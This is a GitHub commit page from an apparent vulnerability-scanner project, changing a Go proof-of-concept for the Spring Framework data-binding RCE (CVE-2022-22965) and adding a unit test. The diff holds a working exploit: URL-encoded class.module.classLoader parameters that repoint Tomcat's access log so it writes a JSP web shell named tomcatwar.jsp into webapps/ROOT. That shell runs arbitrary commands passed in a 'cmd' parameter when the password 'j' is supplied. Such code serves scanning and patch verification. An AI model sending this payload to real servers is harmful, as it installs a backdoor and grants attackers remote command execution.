Skip to content

Commit a254dee

Browse files
hktalenthktalent
committed
Spring Framework RCE via Data Binding on JDK 9+ (CVE-2022-22965) 2022-10-13
1 parent bd2a0c0 commit a254dee

File tree

2 files changed

+33
-7
lines changed

2 files changed

+33
-7
lines changed

pocs_go/Springboot/CVE-2022-22965.go

Lines changed: 10 additions & 7 deletions
Original file line numberDiff line numberDiff line change
@@ -8,17 +8,20 @@ import (
88
)
99

1010
func CVE_2022_22965(u string) bool {
11-
if req, err := util.HttpRequset(u+"?class.module.classLoader%5b1%5d=1", "GET", "", false, nil); err == nil {
12-
if req.StatusCode == 500 {
13-
if req2, err := util.HttpRequset(u+"?class.module.classLoader=1", "GET", "", false, nil); err == nil {
14-
if req2.StatusCode == 200 {
15-
return true
11+
if oU, err := url.Parse(u); nil == err && oU.Host != "" {
12+
szUrl := oU.Scheme + "://" + oU.Host
13+
if req, err := util.HttpRequset(szUrl+"?class.module.classLoader%5b1%5d=1", "GET", "", false, nil); err == nil {
14+
if req.StatusCode == 500 {
15+
if req2, err := util.HttpRequset(szUrl+"?class.module.classLoader=1", "GET", "", false, nil); err == nil {
16+
if req2.StatusCode == 200 {
17+
return true
18+
}
1619
}
1720
}
1821
}
19-
}
20-
if oU, err := url.Parse(u); nil == err && oU.Host != "" {
22+
2123
cc := socket.NewCheckTarget(u, "tcp", 50)
24+
defer cc.Close()
2225
cc.SendPayload([]byte(strings.ReplaceAll(`GET /?class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat= HTTP/1.1
2326
Host: `+oU.Host+`
2427
Accept-Encoding: gzip, deflate

pocs_go/Springboot/CVE-2022-22965_test.go

Lines changed: 23 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,23 @@
1+
package Springboot
2+
3+
import "testing"
4+
5+
func TestCVE_2022_22965(t *testing.T) {
6+
type args struct {
7+
u string
8+
}
9+
tests := []struct {
10+
name string
11+
args args
12+
want bool
13+
}{
14+
{"test CVE_2022_22965", args{"http://127.0.0.1:8080"}, true},
15+
}
16+
for _, tt := range tests {
17+
t.Run(tt.name, func(t *testing.T) {
18+
if got := CVE_2022_22965(tt.args.u); got != tt.want {
19+
t.Errorf("CVE_2022_22965() = %v, want %v", got, tt.want)
20+
}
21+
})
22+
}
23+
}

0 commit comments

Comments
 (0)